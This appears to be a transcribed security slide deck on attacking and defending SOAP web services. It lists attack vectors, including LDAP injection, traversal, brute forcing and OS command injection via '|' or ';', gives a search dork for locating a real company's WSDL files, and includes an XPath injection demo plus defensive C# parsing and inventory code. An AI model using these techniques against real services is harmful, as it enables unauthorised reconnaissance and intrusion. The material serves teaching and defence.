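if __name__ == "__main__":
    print(build_query_unsafe(INJECTION, "any"))   # the expression from the slide
    print(build_query_safe(INJECTION, "any"))     # the same input, now an inert literal
    print(check_credentials(USERS_XML, INJECTION, "any"))
```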
  • 55. AV 6 – LDAP injection • LDAP authentication in place • Possible to manipulate LDAP queries • May lead to enumeration or manipulation • Interesting attack vector • Fault code leaks the LDAP interface
  • 56. AV 7 – File System access • Identifying file system points • Directory traversal & access • Leads to file access and source code exposure • Lethal if found!
  • 57. AV 7 – SOAP brute forcing • SOAP envelope carries user & password accounts. • It is possible to brute-force the SOAP envelope and look for specific responses. • This is a possible attack that can get into the system. • Analyzing the SOAP response is key for this set of attacks.
  • 58. AV 8 – Parameter overflow • Adding large buffers to XML nodes • Depending on code controls, handling may fail • Breaking the application • May lead to compromise as well • Traditional buffer overflow type attacks
  • 59. AV 9 – Operating System access • Points to the OS • Remote command execution is possible • Either by “|” or “;” • Attack is very much possible • Leads to admin/root on the box…
  • 60. AV 10 – Session hijacking • Web services can maintain sessions • [WebMethod(EnableSession=true)] • Possible to reverse engineer the session • Cookie tampering is a reality… • Can be compared to traditional web application sessions.
  • 61. Other attacks • External referencing – XML schema • XSS attack • In transit attacks – replay and spoofing
  • 62. © Blueinfy Solutions Pvt. Ltd. Securing SOA
  • 63. Defense 1: SOAP filtering • A regular firewall will not work • Content filtering on HTTP will not work either, since it is SOAP over HTTP/HTTPS • SOAP level filtering and monitoring would be required • ISAPI level filtering is essential • SOAP content filtering – products or in-house
  • 64. Defense 1: SOAP filtering (diagram): Web Services Client -> SOAP Envelope -> IIS Web Server HTTP Stack -> web2wall (Filter; Rules for SOAP; Reject) -> .Net Web Services
  • 65. Defense 2: WSDL hardening • WSDL is a major source of information • Should not have any leakage • Only provide necessary methods • Invoke over SSL only • Harden WSDL thoroughly
  • 66. Defense 3: Authentication & Authorization • WSDL access control • Use of SAML • Credentials – WS-Security • Certificate analysis • SOAP and XML filtering before access
  • 67. Defense 4: Secure Coding • Fault code management and Exception control • Input validation • SQL integration • Levels of coding using different components
  • 68. Defense 5: XML parsing • A good XML parser should be used • .Net/J2EE – may have issues with XML parsing • Buffer overflows using schema poisoning
  • 69. Conclusion
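One way to put Defense 1 (SOAP-level reject rules) and Defense 5 (careful XML parsing) into code, as an added example that is neither the deck's nor web2wall's: the service namespace, the operation allowlist and the size cap are assumed values, and the three envelopes are constructed.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;

// Added example, not the deck's code: a SOAP-level gate that parses the incoming
// envelope with hardened XmlReaderSettings, then applies an allowlist rule on the
// Body. Service namespace, operation names and the size limit are assumed values.
static class SoapGate
{
    const string SoapNs = "http://schemas.xmlsoap.org/soap/envelope/";
    const string ServiceNs = "http://tempuri.org/";
    static readonly HashSet<string> AllowedOps = new HashSet<string> { "getProductInfo" };

    // Returns null when the envelope may pass, otherwise the reason for rejecting it.
    public static string Inspect(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,   // no DOCTYPE: no entity expansion, no external references
            XmlResolver = null,                       // never fetch schemas or entities over the network
            MaxCharactersInDocument = 64 * 1024       // assumed cap; oversized nodes fail here, not in the handler
        };
        var doc = new XmlDocument { XmlResolver = null };
        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), settings))
                doc.Load(reader);
        }
        catch (XmlException e) { return "rejected by parser: " + e.Message; }
        XmlElement env = doc.DocumentElement;
        if (env.LocalName != "Envelope" || env.NamespaceURI != SoapNs) return "not a SOAP 1.1 envelope";
        XmlElement body = env["Body", SoapNs];
        if (body == null) return "missing Body";
        var ops = new List<XmlElement>();
        foreach (XmlNode n in body.ChildNodes) if (n is XmlElement) ops.Add((XmlElement)n);
        if (ops.Count != 1) return "Body must carry exactly one operation";
        if (ops[0].NamespaceURI != ServiceNs || !AllowedOps.Contains(ops[0].LocalName))
            return "operation not exposed: " + ops[0].LocalName;
        return null;
    }

    static void Main()
    {
        // Constructed envelopes: a legitimate call, one carrying a DOCTYPE, one calling an unpublished method
        string ok = "<soap:Envelope xmlns:soap='" + SoapNs + "'><soap:Body><getProductInfo xmlns='" +
                    ServiceNs + "'><id>1</id></getProductInfo></soap:Body></soap:Envelope>";
        foreach (string s in new[] { ok, "<!DOCTYPE x [<!ENTITY e 'x'>]>" + ok, ok.Replace("getProductInfo", "getAdminReport") })
            Console.WriteLine(Inspect(s) ?? "accepted");
    }
}
```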

Editor's Notes

  1. The objective of this section is to use a Web services assessment methodology that is used in the field.
  2. Search engines maintain a cache of all links collected from web sites. Search engines use their own crawling software to fetch links to Web services. Try this: To find web services running on the “amazon” domain, type: inurl:wsdl site:amazon.com
  3. Objective: gather all possible information about Web services
  4. One of the major sources of information: WSDL file
  5. The objective of this step is to scan Web services and gather initial attack points. Web services run with different resources. Each of these resources is linked together, and a scanning exercise helps in collecting these resources. A WSDL file is a very important resource for Web services, and its scanning is therefore a very important exercise. WSDL is an XML document that serves two purposes: it defines how to access Web services, and it furnishes information about where to access these Web services. In a nutshell, WSDL specifies the location and operations of Web services. Any Web service client can fetch information from the WSDL and build specific requests.
  6. WSDL has 4 main components (XML): types element: used when the defined data types are complex types. binding element: contains information about accessing Web services. Has two attributes: name (any name) and type, which links <binding> to <portType>. soap:binding element provides the style and transport attribute information, e.g. http://schemas.xmlsoap.org/soap/http (reflects the SOAP protocol over HTTP); style can be either rpc or document. soap:operation element carries the soapAction attribute, which is mandatory for certain operations: the HTTP request must be sent over the network with SOAPAction in the HTTP header (otherwise the Web service would not respond).
  7. Service name: dvds4less Binding address: http://192.168.11.2/ws/dvds4less.asmx This information provides the location and its access position. All calls and Web-based API invocations will be handled at this location.
  8. portType element: comparable to a class or module in C++ or Java. A class or module contains a set of methods that can be accessed. These methods are specified in the <operation> element. Operations and methods are the actual entry points to Web services. portType presents the type of invocation supported (SOAP); sometimes GET and POST are also supported. Operation represents the method name.
  9. message element: contains information about the name and type of parameters.
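An added example, not from the deck, that reads the elements described in notes 5 to 9 out of a WSDL and lists every entry point it advertises, which is the inventory to check before publishing a WSDL (Defense 2). The WSDL text is a constructed sample modelled on the dvds4less service; the message, operation and namespace values are assumed.

```csharp
using System;
using System.Collections.Generic;
using System.Xml;

// Added example, not the deck's code. The WSDL is a constructed sample modelled
// on the deck's dvds4less service; its operation and namespace values are assumed.
static class WsdlInventory
{
    const string SampleWsdl = @"<definitions name='dvds4less' targetNamespace='http://tempuri.org/'
  xmlns='http://schemas.xmlsoap.org/wsdl/' xmlns:soap='http://schemas.xmlsoap.org/wsdl/soap/'
  xmlns:tns='http://tempuri.org/' xmlns:s='http://www.w3.org/2001/XMLSchema'>
  <message name='getProductInfoIn'><part name='id' type='s:string'/></message>
  <message name='getProductInfoOut'><part name='result' type='s:string'/></message>
  <portType name='dvds4lessSoap'><operation name='getProductInfo'>
    <input message='tns:getProductInfoIn'/><output message='tns:getProductInfoOut'/>
  </operation></portType>
  <binding name='dvds4lessSoap' type='tns:dvds4lessSoap'>
    <soap:binding transport='http://schemas.xmlsoap.org/soap/http' style='rpc'/>
    <operation name='getProductInfo'><soap:operation soapAction='http://tempuri.org/getProductInfo'/></operation>
  </binding>
  <service name='dvds4less'><port name='dvds4lessSoap' binding='tns:dvds4lessSoap'>
    <soap:address location='http://192.168.11.2/ws/dvds4less.asmx'/>
  </port></service>
</definitions>";

    // One line per entry point: endpoint location, operation name and its SOAPAction.
    // Assumes a single SOAP binding, as in the sample.
    public static List<string> Inventory(string wsdl)
    {
        var doc = new XmlDocument { XmlResolver = null };   // a fetched WSDL must not pull in external entities
        doc.LoadXml(wsdl);
        var ns = new XmlNamespaceManager(doc.NameTable);
        ns.AddNamespace("wsdl", "http://schemas.xmlsoap.org/wsdl/");
        ns.AddNamespace("soap", "http://schemas.xmlsoap.org/wsdl/soap/");
        var lines = new List<string>();
        foreach (XmlNode port in doc.SelectNodes("//wsdl:service/wsdl:port", ns))
        {
            string location = port.SelectSingleNode("soap:address/@location", ns).Value;
            // the binding lists each exposed operation together with its SOAPAction
            foreach (XmlNode op in doc.SelectNodes("//wsdl:binding/wsdl:operation", ns))
            {
                XmlNode action = op.SelectSingleNode("soap:operation/@soapAction", ns);
                lines.Add(location + " " + op.Attributes["name"].Value + " SOAPAction=" + (action == null ? "(none)" : action.Value));
            }
        }
        return lines;   // anything listed here that is not meant to be public should be removed from the WSDL
    }

    static void Main()
    {
        foreach (string line in Inventory(SampleWsdl)) Console.WriteLine(line);
    }
}
```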